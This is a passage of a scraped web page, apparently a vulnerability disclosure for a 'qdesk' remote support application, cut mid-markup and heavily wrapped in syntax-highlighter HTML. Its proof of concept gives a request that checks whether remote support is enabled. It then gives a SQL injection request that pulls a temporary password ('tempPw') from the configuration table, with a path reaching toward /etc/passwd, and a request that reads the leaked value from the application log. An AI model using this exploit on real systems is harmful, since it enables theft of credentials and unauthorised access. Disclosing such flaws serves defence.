class=\"crayon-sy\">`<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0013 seconds] -->  <\/p>\n<p><strong>Proof of Concept<\/strong><br \/> First we need to check if the remote support is enabled on victims machine. We can check by sending the following CLI request:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59dbf5dfdb116786517611\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8220;`  CLI \/apps\/qdesk\/cli\/supportutils\/upload\/a HTTP\/1.1  Host: 192.168.1.55:8080  Upgrade-Insecure-Requests: 1  User-Agent: Mozilla\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/58.0.3029.110 Safari\/537.36  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8  Accept-Encoding: gzip, deflate, sdch  Accept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4  Connection: close  &#8220;`<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb116786517611-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb116786517611-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb116786517611-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb116786517611-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb116786517611-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb116786517611-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb116786517611-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb116786517611-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb116786517611-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb116786517611-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb116786517611-1\"><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb116786517611-2\"><span class=\"crayon-v\">CLI<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">apps<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">qdesk<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">cli<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">supportutils<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">upload<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb116786517611-3\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.55<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">8080<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb116786517611-4\"><span class=\"crayon-v\">Upgrade<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Insecure<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Requests<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb116786517611-5\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-i\">NT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6.1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Win64<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">x64<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AppleWebKit<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">537.36<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">KHTML<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">like <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Chrome<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">58.0.3029.110<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Safari<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">537.36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb116786517611-6\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">image<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">webp<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb116786517611-7\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">deflate<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sdch<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb116786517611-8\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pl<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">PL<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">pl<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.6<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.4<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb116786517611-9\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">close<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb116786517611-10\"><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0020 seconds] -->  <\/p>\n<p>If its not enable &#8220;Remote session is not enabled&#8221; text will be displayed.<\/p>\n<p>Now we can trigger the SQL Injection by sending the following request:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59dbf5dfdb119792559582\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8220;&#8220;  CLI \/apps\/qdesk\/cli\/supportutils\/applog\/reg\/bb&#8217;,(SELECT\/*a*\/cfgValue\/*a*\/FROM\/*a*\/configuration\/*a*\/WHERE\/*a*\/cfgKey=&#8217;tempPw&#8217;),&#8217;149881968&#8242;)\/*\/::\/etc\/passwd HTTP\/1.1  Host: 192.168.1.55:8080  Upgrade-Insecure-Requests: 1  User-Agent: Mozilla\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/58.0.3029.110 Safari\/537.36  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8  Accept-Encoding: gzip, deflate, sdch  Accept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4  Connection: close  &#8220;&#8220;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb119792559582-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb119792559582-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb119792559582-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb119792559582-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb119792559582-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb119792559582-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb119792559582-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb119792559582-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb119792559582-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb119792559582-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb119792559582-1\"><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb119792559582-2\"><span class=\"crayon-v\">CLI<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">apps<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">qdesk<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">cli<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">supportutils<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">applog<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">reg<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">bb<\/span><span class=\"crayon-s\">&#8216;,(SELECT\/*a*\/cfgValue\/*a*\/FROM\/*a*\/configuration\/*a*\/WHERE\/*a*\/cfgKey=&#8217;<\/span><span class=\"crayon-i\">tempPw<\/span><span class=\"crayon-s\">&#8216;),&#8217;<\/span><span class=\"crayon-cn\">149881968<\/span>&#8216;<span class=\"crayon-sy\">)<\/span><span class=\"crayon-c\">\/*\/::\/etc\/passwd HTTP\/1.1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb119792559582-3\"><span class=\"crayon-c\">Host: 192.168.1.55:8080<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb119792559582-4\"><span class=\"crayon-c\">Upgrade-Insecure-Requests: 1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb119792559582-5\"><span class=\"crayon-c\">User-Agent: Mozilla\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/58.0.3029.110 Safari\/537.36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb119792559582-6\"><span class=\"crayon-c\">Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb119792559582-7\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">deflate<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sdch<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb119792559582-8\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pl<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">PL<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">pl<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.6<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.4<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb119792559582-9\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">close<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb119792559582-10\"><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0012 seconds] -->  <\/p>\n<p>The server will respond with<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59dbf5dfdb11c122986552\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8220;&#8220;  CLI \/apps\/qdesk\/cli\/supportutils\/applog\/list HTTP\/1.1  Host: 192.168.1.55:8080  Cache-Control: max-age=0  Upgrade-Insecure-Requests: 1  User-Agent: Mozilla\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/58.0.3029.110 Safari\/537.36  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8  Accept-Encoding: gzip, deflate, sdch  Accept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4  Connection: close  &#8220;&#8220;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb11c122986552-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb11c122986552-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb11c122986552-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb11c122986552-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb11c122986552-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb11c122986552-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb11c122986552-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb11c122986552-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb11c122986552-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59dbf5dfdb11c122986552-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59dbf5dfdb11c122986552-11\">11<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb11c122986552-1\"><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb11c122986552-2\"><span class=\"crayon-v\">CLI<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">apps<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">qdesk<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">cli<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">supportutils<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">applog<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">list <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb11c122986552-3\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.55<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">8080<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb11c122986552-4\"><span class=\"crayon-v\">Cache<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Control<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">max<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">age<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb11c122986552-5\"><span class=\"crayon-v\">Upgrade<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Insecure<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Requests<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59dbf5dfdb11c122986552-6\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-i\">NT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6.1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Win64<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">x64<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AppleWebKit<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">537.36<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">KHTML<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">like <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Chrome<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">58.0.3029.110<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Safari<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">537.36<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59dbf5dfdb11c122986552-7\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">image<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">webp<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span 